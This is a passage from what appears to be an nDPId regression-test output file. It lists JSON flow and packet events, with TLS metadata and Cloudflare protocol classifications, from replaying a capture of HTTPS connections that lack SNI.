+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1604822444913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444913,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGlCjAqAF3aBB8YMmcAbs\/DuN6AAAAALAC\/\/+FPgAAAgQFtAEDAwYBAQgKKlLy+gAAAAAEAgAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1604822445034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822445034,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGmzRoEHxgwKgBdwG7yZyEa\/jPPw7je4AS\/\/9djQAAAgQFeAEBBAIBAwMK"} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1604822445034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822445034,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGlEDAqAF3aBB8YMmcAbs\/DuN7hGv40FAQEACOJgAA"} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447227,"flow_last_seen":1604822447227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447227,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1604822447227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447227,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcmzAbtjbUROAAAAALAC\/\/+t4gAAAgQFtAEDAwYBAQgKKlL7RgAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447249,"flow_last_seen":1604822447249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447249,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1604822447249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447249,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcm0AbsYxEgFAAAAALAC\/\/\/0wAAAAgQFtAEDAwYBAQgKKlL7WQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm1AbvwpFrxAAAAALAC\/\/+HSQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm2AbtLPosXAAAAALAC\/\/\/8iAAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm3AbsAL2HpAAAAALAC\/\/9wxQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1604822447311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447311,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybNKGfaqY21ET4AS\/\/\/K9AAAAgQFeAEBBAIBAwMK"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1604822447311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447311,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcmzAbtjbURPShn2q1AQEAD7jQAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1604822447325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447325,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybQgqbhsGMRIBoAS\/\/95lAAAAgQFeAEBBAIBAwMK"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1604822447325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447325,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcm0AbsYxEgGIKm4bVAQEACqLQAA"} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1604822447368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447368,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybVDiAdt8KRa8oAS\/\/+aXQAAAgQFeAEBBAIBAwMK"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1604822447369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447369,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm1AbvwpFryQ4gHblAQEADK9gAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1604822447370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447370,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybbraGnySz6LGIAS\/\/8FNwAAAgQFeAEBBAIBAwMK"} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1604822447370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447370,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm2AbtLPosY62hp81AQEAA10AAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1604822447373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447373,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybcBQwC0AC9h6oAS\/\/\/M1wAAAgQFeAEBBAIBAwMK"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1604822447373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447373,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm3AbsAL2HqAUMAtVAQEAD9cAAA"} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
